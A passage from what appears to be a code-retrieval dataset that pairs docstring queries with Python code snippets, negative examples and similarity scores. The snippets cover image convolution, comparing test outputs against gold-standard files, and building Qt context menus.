Pstruct, \n filter_shape, \n image_index,\n channel_index) \n # downsample each feature map individually, using maxpooling\n start = time.time()\n pooled_out = downsample.max_pool_2d(input=input4D,\n ds=poolsize, \n ignore_border=True)\n end = time.time()\n self.downsample_time = (end - start)*1000/ image_shape[0]\n \n \n # add the bias term. Since the bias is a vector (1D array), we first\n # reshape it to a tensor of shape (1,n_filters,1,1). Each bias will\n # thus be broadcasted across mini-batches and feature map\n # width & height\n self.output = T.tanh(pooled_out + b.dimshuffle('x', 0, 'x', 'x'))", "def my_imfilter(image, filter):\n\n assert filter.shape[0] % 2 == 1\n assert filter.shape[1] % 2 == 1\n\n p1 = filter.shape[0]//2\n p2 = filter.shape[1]//2\n pad1 = np.pad(image[:,:,0],((p1,p1),(p2,p2)),'reflect')\n pad2 = np.pad(image[:,:,1],((p1,p1),(p2,p2)),'reflect')\n pad3 = np.pad(image[:,:,2],((p1,p1),(p2,p2)),'reflect')\n image_pad = np.dstack([pad1,pad2,pad3])\n filtered_image = np.zeros((image.shape[0],image.shape[1],3))\n for c in range(3):\n for i in range(image.shape[0]):\n for j in range(image.shape[1]):\n filtered_image[i,j,c] = np.sum(image_pad[i:i+filter.shape[0],j:j+filter.shape[1],c]*filter)\n \n return filtered_image", "def convolution(image, kernel, scale=None, offset=0):\n kernel = np.array(kernel).flatten().tolist()\n if len(kernel)==9:\n size = (3,3)\n elif len(kernel)==25:\n size = (5,5)\n else:\n raise ValueError('Kernel size must be (3,3) or (5,5).')\n return image.filter(ImageFilter.Kernel(size, kernel, scale, offset))" ]
[ "0.7495514", "0.69816136", "0.6926627", "0.6658543", "0.6642495", "0.6620933", "0.66170156", "0.65827525", "0.65733373", "0.65717804", "0.6559641", "0.64966655", "0.6421656", "0.6419542", "0.6402899", "0.64008325", "0.63947445", "0.6285137", "0.62369514", "0.62244105", "0.6218898", "0.6186167", "0.6151984", "0.61247694", "0.6120538", "0.61137193", "0.611018", "0.6095561", "0.6094685", "0.608818" ]
0.69993824
1
Check that all output files are produced and are equivalent to the ones in the goldStandard folder.
def _checkOutputs(self, outputs, random=False, errorthreshold=0.001): for out in outputs: outFile = os.path.join(self._testDir, self.outputDir, out) fileGoldStd = os.path.join(self.goldDir, out) # Check the expect output file was produced msg = "Missing expected output file:\n output: %s" % outFile self.assertTrue(os.path.exists(outFile), red(msg)) if random: print(yellow("WARNING: %s was created using a random seed, check skipped..." % outFile)) else: fnGoldStd = xmippLib.FileName(fileGoldStd) if fnGoldStd.isImage(): im1 = xmippLib.Image(fileGoldStd) im2 = xmippLib.Image(outFile) msg = "Images are not equal (+-%f):\n output: %s\n gold: %s" % \ (errorthreshold, outFile, fileGoldStd) self.assertTrue(im1.equal(im2, errorthreshold), red(msg)) elif fnGoldStd.isMetaData(): msg = "MetaDatas are not equal:\n output: %s\n gold: %s" % (outFile, fileGoldStd) self.assertTrue(xmippLib.compareTwoMetadataFiles(outFile, fileGoldStd), red(msg)) else: msg = "Files are not equal:\n output: %s\n gold: %s" % (outFile, fileGoldStd) self.assertTrue(xmippLib.compareTwoFiles(outFile, fileGoldStd, 0), red(msg))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_generated_files(out_dir, output_list_file):\n xcpd_dir = os.path.join(out_dir, \"xcp_d\")\n found_files = sorted(glob(os.path.join(xcpd_dir, \"**/*\"), recursive=True))\n found_files = [os.path.relpath(f, out_dir) for f in found_files]\n\n # Ignore figures\n found_files = [f for f in found_files if \"figures\" not in f]\n\n with open(output_list_file, \"r\") as fo:\n expected_files = fo.readlines()\n expected_files = [f.rstrip() for f in expected_files]\n\n if sorted(found_files) != sorted(expected_files):\n expected_not_found = sorted(list(set(expected_files) - set(found_files)))\n found_not_expected = sorted(list(set(found_files) - set(expected_files)))\n\n msg = \"\"\n if expected_not_found:\n msg += \"\\nExpected but not found:\\n\\t\"\n msg += \"\\n\\t\".join(expected_not_found)\n\n if found_not_expected:\n msg += \"\\nFound but not expected:\\n\\t\"\n msg += \"\\n\\t\".join(found_not_expected)\n raise ValueError(msg)", "def test_output_exists():\n global out_dir, cor_dir\n assert(path.exists(path.join(out_dir, 'oshea_similarity.json')))", "def checkAllFilesGenerated(self):\n root = get_exhale_root(self)\n containmentFolder = self.getAbsContainmentFolder()\n for node in root.all_nodes:\n if node.kind in [\"enumvalue\", \"group\"]:\n continue\n gen_file_path = os.path.join(containmentFolder, node.file_name)\n self.assertTrue(\n os.path.isfile(gen_file_path),\n \"File for {kind} node with refid=[{refid}] not generated to [{gen_file_path}]!\".format(\n kind=node.kind, refid=node.refid, gen_file_path=gen_file_path\n )\n )", "def check_all_files_and_dirs(self):\n err = 0\n err_m = ''\n warning = 0\n warning_m = ''\n # Check the pdb file for refinement\n if self.refine_pdb_in == None:\n err = 1\n err_m += '\\nPdb file should be supplied'\n else:\n if self.check_single_file(self.refine_pdb_in):\n self.refine_pdb_in = os.path.abspath(self.refine_pdb_in)\n else:\n err = 1\n err_m += '\\nFile not found: %s' %(self.refine_pdb_in)\n\n # Check the pdb file for distance analysis\n if self.check_single_file(self.X8_pdb_in):\n self.X8_pdb_in = os.path.abspath(self.X8_pdb_in)\n else:\n self.X8_pdb_in != None\n warning = 1\n warning_m += '\\nXtrapol8 pdb_in not found. No additional analysis will be applied'\n\n # Check additional files and append them to a string\n additional = \"\"\n for fle in self.additional:\n if len(fle)>0:\n if self.check_single_file(fle):\n new_add = os.path.abspath(fle)\n additional = additional + \"%s \" % (new_add)\n else:\n err = 1\n err_m += '\\nFile not found: %s' %(fle)\n self.additional = additional\n\n #Check the output directory\n if os.path.isdir(self.outdir):\n self.outdir = os.path.abspath(self.outdir)\n else:\n err = 1\n err_m += \"\\nXtrapol8 output directory cannot be found.\" \\\n \"Please run this from the same directory from which you ran Xtrapol8.\"\n\n #Check the phil file for reciprocal space refinement\n if self.check_single_file(self.reciprocal_space_phil):\n self.reciprocal_space_phil = os.path.abspath(self.reciprocal_space_phil)\n else:\n self.reciprocal_space_phil = ''\n warning = 1\n warning_m += '\\nPhil for reciprocal space refinement not found. Refinement will use default parameters.'\n\n\n #Check the phil file for real space refinement\n if self.check_single_file(self.real_space_phil):\n self.real_space_phil = os.path.abspath(self.real_space_phil)\n else:\n self.real_space_phil = ''\n warning = 1\n warning_m += '\\nPhil for real space refinement not found. 
Refinement will use default parameters.'\n\n #Check the residue list for distance analysis\n if self.check_single_file(self.residue_list):\n self.residue_list = os.path.abspath(self.residue_list)\n else:\n self.residue_list = None\n warning = 1\n warning_m += '\\nResidue list not found. Distance analysis (if required) will be performed without residue list.'\n\n return err, err_m, warning, warning_m", "def test_conformance_tests_test_output(self):\n style = pycodestyle.StyleGuide(quiet=True)\n result = style.check_files(['tests/test_output.py'])\n self.assertEqual(result.total_errors, 0,\n \"Found code style errors (and warnings).\")", "def check_file_output(self, actual: str, expected: str):\n assert self._program_executed, f\"You first need to `execute` the program before checking its outputs!\"\n assert actual in self._write_files, f\"Unknown output file {actual}. Did you forget to provide it to the program by calling input_write_filename?\"\n full_expected = _root_dir / expected\n assert full_expected.is_file(), f\"Reference file {full_expected} does not exist!\"\n # check to make sure the output file exists\n full_actual = _root_dir / actual\n self._test.assertTrue(full_actual.is_file(), f\"It seems like the program never created the output file {full_actual}\")\n # open and compare the files\n with open(full_actual, 'rb') as a:\n actual_bin = a.read()\n with open(full_expected, 'rb') as e:\n expected_bin = e.read()\n self._test.assertEqual(actual_bin, expected_bin, f\"Bytes of {actual} and {expected} did not match!\")", "def test_conformance_core_output(self):\n style = pycodestyle.StyleGuide(quiet=True)\n result = style.check_files(['core/output.py'])\n self.assertEqual(result.total_errors, 0,\n \"Found code style errors (and warnings).\")", "def _assert_correct_files_are_present(outputdir: Path) -> None:\n for plane in PLANES:\n assert (outputdir / f\"{AMP_BETA_NAME}{plane.lower()}.tfs\").is_file()\n assert (outputdir / f\"{BETA_NAME}{plane.lower()}.tfs\").is_file()\n assert (outputdir / f\"{PHASE_NAME}{plane.lower()}.tfs\").is_file()\n assert (outputdir / f\"{TOTAL_PHASE_NAME}{plane.lower()}.tfs\").is_file()\n assert (outputdir / f\"{ORBIT_NAME}{plane.lower()}.tfs\").is_file()\n assert (outputdir / f\"{DISPERSION_NAME}x.tfs\").is_file()\n assert (outputdir / f\"{NORM_DISP_NAME}x.tfs\").is_file() # no norm disp in Y plane\n\n for rdt in [\"1001\", \"1010\"]:\n assert (outputdir / f\"f{rdt}.tfs\").is_file()", "def checkCopiedFiles(self):\n self.missingAiCopies = 0\n self.invalidAiCopies = 0\n self.invalidMapCopies = 0\n self.missingMapCopies = 0\n\n for iFile in self.inputFilesAll:\n if not (os.path.isfile(self.MAPCOPY + iFile + '.msb')):\n self.missingMapCopies += 1\n else:\n with open(self.MAPCOPY + iFile + '.msb', 'rb') as testFile:\n if (len(testFile.read()) < 10):\n self.invalidMapCopies += 1\n\n if not (iFile == \"m12_00_00_01\"):\n if (self.useDCX):\n if not (os.path.isfile(self.AICOPY + iFile + '.luabnd.dcx')):\n self.missingAiCopies += 1\n else:\n with open(self.AICOPY + iFile + '.luabnd.dcx', 'rb') as testFile:\n if (len(testFile.read()) < 10):\n self.invalidAiCopies += 1\n else:\n if not (os.path.isfile(self.AICOPY + iFile + '.luabnd')):\n self.missingAiCopies += 1\n else:\n with open(self.AICOPY + iFile + '.luabnd', 'rb') as testFile:\n if (len(testFile.read()) < 10):\n self.invalidAiCopies += 1\n\n if (self.missingAiCopies > 0 or self.invalidAiCopies > 0 or self.missingMapCopies > 0 or self.invalidMapCopies > 0 or self.missingSfxCopies > 0 or self.invalidSfxCopies > 
0):\n return False\n else:\n return True", "def test_check_if_output_file_exists():\n input_file = os.path.join(os.getcwd(), 'tests', 'input_test_file.docx')\n output_file = os.path.join(os.getcwd(), 'tests', 'output_test_file.txt')\n\n questions_parser = QuestionsParser()\n questions_parser.main(argv=['-i', input_file, '-o', output_file])\n assert os.path.exists(output_file)\n os.unlink(output_file)", "def check_systtests_pickle_files(self):\n # Make sure that there have been no more new scan points run since this\n # last processing. To do this, get the number of output directories\n # Compare this to the number in the pickle files.\n self.num_systematics = {}\n for basename in nsort(os.listdir(self.logdir)):\n if 'pckl' in basename:\n continue\n basename_content = nsort(\n os.listdir(os.path.join(self.logdir, basename))\n )\n # This means it is a directory containing something useful\n if 'config_summary.json' in basename_content:\n bits = basename.split('toy_')[-1].split('_')\n toyname = None\n add_bit = True\n for bit in bits:\n if bit == '' or bit == 'inj':\n add_bit = False\n if add_bit:\n if toyname is None:\n toyname = bit\n else:\n toyname += '_%s'%bit\n if '_full_syst_baseline' in toyname:\n toyname = toyname.split('_full_syst_baseline')[0]\n toyname = 'toy_%s_asimov'%toyname\n if toyname not in self.num_systematics.keys():\n self.num_systematics[toyname] = 0\n if 'wrong' in basename:\n # Only want to include each systematic once, but\n # they will have two directions.\n if 'pve' in basename:\n self.num_systematics[toyname] += 1\n else:\n self.num_systematics[toyname] += 1\n data_sets = from_file(os.path.join(self.logdir,\n 'data_sets.pckl'))\n if sorted(data_sets.keys()) != sorted(self.num_systematics.keys()):\n logging.info(\n 'Found files I assume to be from a previous run of'\n ' this processing script containing these truths: %s. '\n 'However, based on the directories in the overall '\n 'output directory there should be these truths: %s, so '\n 'they will be regenerated.'%(\n sorted(data_sets.keys()),\n sorted(self.num_systematics.keys())\n )\n )\n pickle_there = True\n for toyname in sorted(self.num_systematics.keys()):\n if len(data_sets[toyname].keys()) != self.num_systematics[toyname]:\n pickle_there = False\n if pickle_there:\n logging.info(\n 'Found files I assume to be from a previous run of'\n ' this processing script containing %i sytematics. If '\n 'this seems incorrect please delete the files: '\n 'data_sets.pckl, all_params.pckl and labels.pckl '\n 'from the logdir you have provided.'%(\n self.num_systematics[self.num_systematics.keys()[0]])\n )\n else:\n logging.info(\n 'Found files I assume to be from a previous run of'\n ' this processing script containing %i systematics. 
'\n 'However, based on the number of directories in the overall '\n 'output directory there should be %i systematics in '\n 'these pickle files, so they will be regenerated.'%(\n len(data_sets[data_sets.keys()[0]].keys()),\n self.num_systematics[self.num_systematics.keys()[0]]\n )\n )\n pickle_there = False\n\n return pickle_there", "def test_multiple_output_files(self):\r\n convert_fastq(self.fasta_file_path, self.qual_file_path,\r\n multiple_output_files=True,\r\n output_directory=self.output_dir,\r\n per_file_buffer_size=23)\r\n\r\n sample_ids = [('PC.634', expected_fastq_634_default),\r\n ('PC.354', expected_fastq_354_default),\r\n ('PC.481', expected_fastq_481_default)]\r\n for sample_id, expected_output in sample_ids:\r\n actual_output_file_path = get_filename_with_new_ext(\r\n self.fasta_file_path,\r\n '_' + sample_id + '.fastq',\r\n self.output_dir)\r\n\r\n actual_output_file = open(actual_output_file_path)\r\n actual_output = actual_output_file.read()\r\n actual_output_file.close()\r\n self._files_to_remove.append(actual_output_file_path)\r\n\r\n self.assertEquals(actual_output, expected_output)", "def _check_numpy_output(self, cwd):\n\n for ii, refname in enumerate(self.files):\n if self.forms[ii] == \"numpy\":\n try:\n ref_output = np.loadtxt(\n Path(cwd) / refname, usecols=self.usecol[ii]\n )\n except IOError:\n raise IOError(\n 'Please provide a reference properties output named \"{}\"'.format(\n refname\n )\n )\n except ValueError:\n raise ValueError(\n \"Please check ref_simulation.out in {}\".format(\n str((self.parent / cwd).absolute())\n )\n )\n\n fname = refname[4:]\n test_output = np.loadtxt(self.tmp_dir / fname, usecols=self.usecol[ii])\n\n try:\n np.testing.assert_allclose(\n test_output, ref_output, rtol=1.0e-7, atol=1.0e-15\n )\n # print(\"No anomaly during the regtest for {}\".format(refname))\n except AssertionError:\n raise AssertionError(\n \"ANOMALY: Disagreement between reference and {} in {}\".format(\n fname, str((self.parent / cwd).absolute())\n )\n )", "def test_multiple_output_files(self):\r\n convert_fastaqual(self.fasta_file_path,\r\n multiple_output_files=True,\r\n output_directory=self.output_dir,\r\n per_file_buffer_size=23)\r\n\r\n sample_id_s = [('PC.634', expected_fasta_634_default,\r\n expected_qual_634_default),\r\n ('PC.354', expected_fasta_354_default,\r\n expected_qual_354_default),\r\n ('PC.481', expected_fasta_481_default,\r\n expected_qual_481_default)]\r\n for sample_id, expected_fasta, expected_qual in sample_id_s:\r\n actual_output_fasta_path = get_filename_with_new_ext(\r\n self.fasta_file_path,\r\n '_' + sample_id + '.fna',\r\n self.output_dir)\r\n\r\n actual_output_qual_path = get_filename_with_new_ext(\r\n self.fasta_file_path,\r\n '_' + sample_id + '.qual',\r\n self.output_dir)\r\n\r\n actual_output_fasta = open(actual_output_fasta_path)\r\n actual_output_qual = open(actual_output_qual_path)\r\n actual_fasta = actual_output_fasta.read()\r\n actual_output_fasta.close()\r\n actual_qual = actual_output_qual.read()\r\n actual_output_qual.close()\r\n self._files_to_remove.append(actual_output_fasta_path)\r\n self._files_to_remove.append(actual_output_qual_path)\r\n\r\n self.assertEquals(actual_fasta, expected_fasta)\r\n self.assertEquals(actual_qual, expected_qual)", "def output_files_exist(self):\n return all([split.exists() for split in self.split_files])", "def _CompareFiles(self):\n if sys.platform == 'win32':\n # On Windows flags are stored in .rsp files which are created by building.\n print >> sys.stderr, 'Building in %s...' 
% _GN_OUT_DIR\n Run('ninja -C %s -d keeprsp %s' % (_GN_OUT_DIR, self._gn_target))\n print >> sys.stderr, 'Building in %s...' % _GYP_OUT_DIR\n Run('ninja -C %s -d keeprsp %s' % (_GYP_OUT_DIR, self._gn_target))\n\n gn = Run('ninja -C %s -t commands %s' % (_GN_OUT_DIR, self._gn_target))\n gyp = Run('ninja -C %s -t commands %s' % (_GYP_OUT_DIR, self._gyp_target))\n\n self._gn_flags = self._GetFlags(gn.splitlines(),\n os.path.join(os.getcwd(), _GN_OUT_DIR))\n self._gyp_flags = self._GetFlags(gyp.splitlines(),\n os.path.join(os.getcwd(), _GYP_OUT_DIR))\n\n all_files = sorted(self.gn_files & self.gyp_files)\n for filename in all_files:\n gyp_flags = self._gyp_flags[filename]\n gn_flags = self._gn_flags[filename]\n self._CompareLists(filename, gyp_flags, gn_flags, 'dash_f')\n self._CompareLists(filename, gyp_flags, gn_flags, 'defines')\n self._CompareLists(filename, gyp_flags, gn_flags, 'include_dirs')\n self._CompareLists(filename, gyp_flags, gn_flags, 'warnings',\n # More conservative warnings in GN we consider to be OK.\n dont_care_gyp=[\n '/wd4091', # 'keyword' : ignored on left of 'type' when no variable\n # is declared.\n '/wd4456', # Declaration hides previous local declaration.\n '/wd4457', # Declaration hides function parameter.\n '/wd4458', # Declaration hides class member.\n '/wd4459', # Declaration hides global declaration.\n '/wd4702', # Unreachable code.\n '/wd4800', # Forcing value to bool 'true' or 'false'.\n '/wd4838', # Conversion from 'type' to 'type' requires a narrowing\n # conversion.\n ] if sys.platform == 'win32' else None,\n dont_care_gn=[\n '-Wendif-labels',\n '-Wextra',\n '-Wsign-compare',\n ] if not sys.platform == 'win32' else None)\n self._CompareLists(filename, gyp_flags, gn_flags, 'other')", "def output_files(self):\n # Output file for Moller generation\n if 'moller' in self.name:\n return ['moller.stdhep']\n # Output file for beam generation\n return ['beam.stdhep']", "def blankOutputFiles():\n print(\"Checking for blank output files\")\n find_output = re.compile(r\"/\\* Output:(.*)\\*/\", re.DOTALL)\n for java in config.example_dir.rglob(\"*.java\"):\n with java.open() as codeFile:\n output = find_output.search(codeFile.read())\n if output:\n # print(output.group(1))\n if not output.group(1).strip():\n print(java)", "def match_files(gold_folder, sys_folder):\n\n print \"Compiling files...\"\n # Get a list of files in the folders supplied.\n gold_files = compile_files(gold_folder) # nnnnG.xml\n sys_files = compile_files(sys_folder) # nnnnXXN.xml\n\n print \"%d gold files found in %s\" % (len(gold_files), base_name(gold_folder))\n print \"%d system files found in %s\\n\" % (len(sys_files), base_name(sys_folder))\n\n print \"Matching system files to gold files...\"\n # Match them up, where nnnn must be common in a pair.\n pairs = [(f1, f2) for f1 in gold_files for f2 in sys_files\n if base_name(f2).startswith(base_name(f1).split(\"GE.\")[0])]\n\n return pairs", "def process_cleanup(self, output_file=None, output_list=None):\n if output_file:\n self.check_output_file( output_file )\n elif output_list:\n for output_file in output_list:\n self.check_output_file( output_file )\n log.info('All expected output files found - process successful!\\n')", "def testFilesExist(self):\n \n for year in range(2007,2013):\n self.assertTrue(os.path.exists(\"./IncomeHistogram_\"+ str(year)+\".pdf\"), \"A histogram didn't save to output.\")\n self.assertTrue(os.path.exists(\"./LogIncomeHistogram_\"+ str(year)+\".pdf\"), \"A histogram didn't save to output.\")\n 
self.assertTrue(os.path.exists(\"./IncomeBoxplot(log)_\"+ str(year)+\".pdf\"), \"A boxplot didn't save to output.\") \n self.assertTrue(os.path.exists(\"./results.txt\"), \"Results file doesn't exist.\")", "def check_output(self):\n directory, file = split(self.target)\n if not exists(directory):\n mkdir(directory)\n if exists(self.target):\n unlink(self.target)", "def com_google_fonts_check_002(fonts):\n\n directories = []\n for target_file in fonts:\n directory = os.path.dirname(target_file)\n if directory not in directories:\n directories.append(directory)\n\n if len(directories) == 1:\n yield PASS, \"All files are in the same directory.\"\n else:\n yield FAIL, (\"Not all fonts passed in the command line\"\n \" are in the same directory. This may lead to\"\n \" bad results as the tool will interpret all\"\n \" font files as belonging to a single\"\n \" font family. The detected directories are:\"\n \" {}\".format(directories))", "def com_google_fonts_check_002(fonts):\n\n directories = []\n for target_file in fonts:\n directory = os.path.dirname(target_file)\n if directory not in directories:\n directories.append(directory)\n\n if len(directories) == 1:\n yield PASS, \"All files are in the same directory.\"\n else:\n yield FAIL, (\"Not all fonts passed in the command line\"\n \" are in the same directory. This may lead to\"\n \" bad results as the tool will interpret all\"\n \" font files as belonging to a single\"\n \" font family. The detected directories are:\"\n \" {}\".format(directories))", "def test_check_mapping_file_multiple_problems(self):\r\n\r\n check_mapping_file(mapping_fp=self.errors_warnings_mapping_fp,\r\n output_dir=self.output_dir,\r\n added_demultiplex_field=\"DoesNotExist\",\r\n verbose=False)\r\n\r\n # Check existence of expected output files\r\n output_html_fp = join(self.output_dir,\r\n basename(self.errors_warnings_mapping_fp).replace('.txt', '.html'))\r\n output_corrected_fp =\\\r\n join(self.output_dir,\r\n basename(self.errors_warnings_mapping_fp).replace('.txt',\r\n '_corrected.txt'))\r\n output_log_fp =\\\r\n join(self.output_dir,\r\n basename(self.errors_warnings_mapping_fp).replace('.txt', '.log'))\r\n overlib_js_fp = join(self.output_dir, 'overlib.js')\r\n\r\n self.assertTrue(exists(output_html_fp))\r\n self.assertTrue(exists(output_corrected_fp))\r\n self.assertTrue(exists(output_log_fp))\r\n self.assertTrue(exists(overlib_js_fp))\r\n\r\n # Check output data for expected results\r\n\r\n html_data = \"\".join([line for line in open(output_html_fp, \"U\")])\r\n corrected_data =\\\r\n \"\".join([line for line in open(output_corrected_fp, \"U\")])\r\n log_data = \"\".join([line for line in open(output_log_fp, \"U\")])\r\n\r\n self.assertEqual(html_data, self.expected_html_errors_warnings_output)\r\n self.assertEqual(corrected_data,\r\n self.expected_corrected_data_errors_warnings)\r\n self.assertEqual(log_data, self.expected_log_errors_warnings_output)", "def test_two_files():\n\n out_file = ''.join(\n random.choices(string.ascii_uppercase + string.digits, k=5))\n try:\n if os.path.isfile(out_file):\n os.remove(out_file)\n\n rv, out = getstatusoutput(f'{prg} -f {tair} {amigo} -o {out_file}')\n assert rv == 0\n assert re.search('1: tair_heat.txt', out)\n assert re.search('2: amigo_heat.txt', out)\n assert re.search(\n f'Wrote 20 gene IDs from 2 files to file \"{out_file}\"', out)\n assert os.path.isfile(out_file)\n exp_two = '\\n'.join(\n sorted(\"\"\"\n AT5G12020 AT3G06400 AT2G33590 AT1G54050 AT5G67030 AT4G14690 AT1G16030 AT5G03720 AT3G10800 \n AT5G12140 
AT1G64280 AT3G24500 AT3G09440 AT3G04120 AT4G19630 AT1G16540 AT2G22360 AT1G13930 \n AT5G41340 AT3G24520\n \"\"\".split()))\n assert open(out_file).read().strip() == exp_two.strip()\n\n finally:\n if os.path.isfile(out_file):\n os.remove(out_file)", "def test_otter_check_script(self):\n # run for each individual test\n for file in glob(TEST_FILES_PATH + \"tests/*.py\"):\n # capture stdout\n output = StringIO()\n with contextlib.redirect_stdout(output):\n\n # mock block_print otherwise it interferes with capture of stdout\n with mock.patch(\"otter.check.block_print\"):\n check(\n TEST_FILES_PATH + \"file0.py\", \n question = os.path.split(file)[1][:-3],\n tests_path = os.path.split(file)[0],\n )\n\n if os.path.split(file)[1] != \"q2.py\":\n self.assertEqual(\n output.getvalue().strip().split(\"\\n\")[-1].strip(), \n \"All tests passed!\", \n \"Did not pass test at {}\".format(file)\n )\n\n # run the file for all questions\n output = StringIO()\n with contextlib.redirect_stdout(output):\n with mock.patch(\"otter.check.block_print\"):\n check(\n TEST_FILES_PATH + \"file0.py\", \n tests_path = os.path.split(file)[0],\n )\n self.assertEqual(\n output.getvalue().strip(), \n dedent(\"\"\"\\\n [0. 0.02002002 0.04004004 0.06006006 0.08008008]\n q1 results: All test cases passed!\n q2 results:\n q2 - 1 result:\n Trying:\n 1 == 1\n Expecting:\n False\n **********************************************************************\n Line 2, in q2 0\n Failed example:\n 1 == 1\n Expected:\n False\n Got:\n True\n\n q2 - 2 result:\n Test case passed!\n q3 results: All test cases passed!\n q4 results: All test cases passed!\n q5 results: All test cases passed!\"\"\"), \n \"Did not pass correct tests\"\n )", "def clean(self):\n print(\"Cleaning outputs in %s\" % self.args.output)\n files = glob.glob(self.args.output + \"*.pkl\")\n for f in files:\n if os.path.exists(f):\n os.remove(f)", "def evaluate_ga_all_fitness_outputs(self):\n outputname = \"my_output\"\n dircontents = os.listdir(self.keywords['name'])\n filelist = list()\n for myfile in dircontents:\n if outputname in myfile:\n filelist.append(os.path.join(self.keywords['name'], myfile))\n filelist.sort()\n last_file = filelist[-1]\n second_to_last_file = filelist[-2]\n from amy_ga_code import can_we_stop_yet\n okay_to_stop = can_we_stop_yet.evaluate(last_file, second_to_last_file)\n if okay_to_stop:\n pass\n else:\n last_time = os.path.basename(last_file).split(\"_\")[-1]\n new_seed_file = \"my_structure_%s\" % last_time\n self.clear_ga_vasp_ingredient(\"vasp_ingredient_match_my_name_in_recipe\", new_seed_file)\n self.change_my_status(\"W\")", "def _test_output_created(self):\n TestHarness._test_output_created(self)\n source = glob.glob(os.path.join(os.getcwd(), 'source.*'))\n assert len(source) == 1, 'Either multiple or no source files ' \\\n 'exist.'\n assert source[0].endswith('h5'), \\\n 'Source file is not a HDF5 file.'" ]
[ "0.6592521", "0.658346", "0.6503008", "0.6485635", "0.64343256", "0.63431185", "0.62933356", "0.6255054", "0.6212415", "0.6163191", "0.6134901", "0.6122998", "0.60994726", "0.60929835", "0.6076817", "0.60678595", "0.6047929", "0.60258394", "0.6014823", "0.5997116", "0.59866434", "0.5985454", "0.59558517", "0.59558517", "0.59490526", "0.5934937", "0.58901906", "0.58860487", "0.5861957", "0.583546" ]
0.7571529
0
Create a context menu for the widget (the main widget for this view).
def make_context_menu(self, widget): self.context_menu_widget = widget self.context_menu_widget.setContextMenuPolicy(Qt.CustomContextMenu) self.context_menu_widget.customContextMenuRequested.connect(self.request_context_menu) self.context_menu = QMenu()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def widget_ctx_menu(self):\n def toggle_step():\n self.showStepExponent = not self.showStepExponent\n\n def toggle_write():\n self.writeOnPress = not self.writeOnPress\n\n menu = self.lineEdit().createStandardContextMenu()\n menu.addSeparator()\n ac = menu.addAction('Toggle Show Step Size')\n ac.triggered.connect(toggle_step)\n\n ac_write = menu.addAction('Toggle Write On Press')\n ac_write.triggered.connect(toggle_write)\n\n return menu", "def _create_context_menu(self):\n self.menu = Gtk.Menu()\n delete_menu = Gtk.MenuItem(\"Delete Task\")\n self.menu.append(delete_menu)", "def addContextMenuItems(*args):", "def _createMainContextMenu(self) -> None:\n # separators for improved readability\n separator1 = QAction(self)\n separator1.setSeparator(True)\n separator2 = QAction(self)\n separator2.setSeparator(True)\n\n self._mainFileView.setContextMenuPolicy(Qt.ActionsContextMenu)\n for action in self._fileActions:\n if action == self._exitAction: # don't include Exit button in the context menu\n continue\n self._mainFileView.addAction(action)\n self._mainFileView.addAction(separator1)\n for action in self._editActions:\n self._mainFileView.addAction(action)\n self._mainFileView.addAction(separator2)\n for action in self._viewActions:\n self._mainFileView.addAction(action)", "def contextMenuEvent(self, event):\n menu = QMenu()\n self.action_options.add_to_context_menu(menu)\n menu.exec_(event.globalPos()) # show menu at mouse position", "def aboutToShowContextMenuEvent(self):\n\t\tpass", "def request_context_menu(self, pos):\n pass", "def _context_menu_make(self, pos):\n format = self._control.cursorForPosition(pos).charFormat()\n name = format.stringProperty(QtGui.QTextFormat.ImageName)\n if name:\n menu = QtGui.QMenu()\n\n menu.addAction('Copy Image', lambda: self._copy_image(name))\n menu.addAction('Save Image As...', lambda: self._save_image(name))\n menu.addSeparator()\n\n svg = self._name_to_svg_map.get(name, None)\n if svg is not None:\n menu.addSeparator()\n menu.addAction('Copy SVG', lambda: svg_to_clipboard(svg))\n menu.addAction('Save SVG As...',\n lambda: save_svg(svg, self._control))\n else:\n menu = super(RichJupyterWidget, self)._context_menu_make(pos)\n return menu", "def create_menus( self ):", "def create_menu():", "def contextMenuEvent(self,event):\n\t\tmenu=self.createStandardContextMenu ()\n\t\tmenu.addAction(self.actionLaunchCharWidgetTable)\n\t\tmenu.exec_(event.globalPos())", "def contextMenuEvent(self, event):\n menu = self.createStandardContextMenu()\n menu.removeAction(menu.actions()[0])\n menu.removeAction(menu.actions()[0])\n menu.insertSeparator(menu.actions()[0])\n menu.insertAction(menu.actions()[0], self.treeSelectAction)\n self.treeSelectAction.setEnabled(self.isChildView and\n len(self.toPlainText().strip()) > 0)\n menu.exec_(event.globalPos())", "def on_context_menu(self, event):\n self.declaration.context_menu_event()", "def misc_menu(self):\n # info needed to separate edit and view widgets in self.widget_classes\n name_test_current = [\n (\"Editor\", lambda x: x.lep_type == 'EDITOR', self.edit_widget.__class__),\n (\"Viewer\", lambda x: x.lep_type != 'EDITOR', self.view_widget.__class__),\n ]\n\n menu = QtWidgets.QMenu()\n for name, is_one, current in name_test_current:\n # list Editor widgets, then Viewer widgets\n for widget_class in [i for i in self.widget_classes if is_one(i)]:\n\n def cb(checked, widget_class=widget_class):\n self.set_widget(widget_class=widget_class)\n\n act = QAction(f\"{name}: {widget_class.lep_name}\", self)\n 
act.setCheckable(True)\n act.setChecked(widget_class == current)\n act.triggered.connect(cb)\n menu.addAction(act)\n\n button = self.control_menu_button\n point = button.position().toPoint() if isQt6 else button.pos() # Qt6 documentation is wrong.\n global_point = button.mapToGlobal(point)\n menu.exec_(global_point)", "def create_menu(self, parent):\n menu = QtGui.QMenu(parent=parent)\n return menu.menuAction()", "def createTabContextMenu(ned, tabIndex):\n pass", "def showContextMenu(self, event):\r\n menu = wx.Menu()\r\n menu.Append(wx.ID_OPEN, \"Open...\\tCtrl+O\", \"Open an image...\", )\r\n menu.Append(wx.ID_SAVE, \"Save\\tCtrl+S\", \"Save the cropped image...\")\r\n menu.AppendSeparator()\r\n menu.Append(wx.ID_ABOUT, \"About\\tCtrl+I\", \"About this program...\")\r\n\r\n menu.Bind(wx.EVT_MENU, self.showOpenImageDialog, id=wx.ID_OPEN)\r\n menu.Bind(wx.EVT_MENU, self.saveImage, id=wx.ID_SAVE)\r\n menu.Bind(wx.EVT_MENU, self.showAboutDialog, id=wx.ID_ABOUT)\r\n\r\n self.PopupMenu(menu, event.GetPosition())\r\n menu.Destroy()", "def menuItem(*args):\n\toptionsWindow()", "def createContextMenu(self, point):\n\n networkNode = self.returnNetworkNode\n mirror = cmds.getAttr(networkNode + \".mirrorModule\")\n\n # icons\n icon_copy = QtGui.QIcon(os.path.join(self.iconsPath, 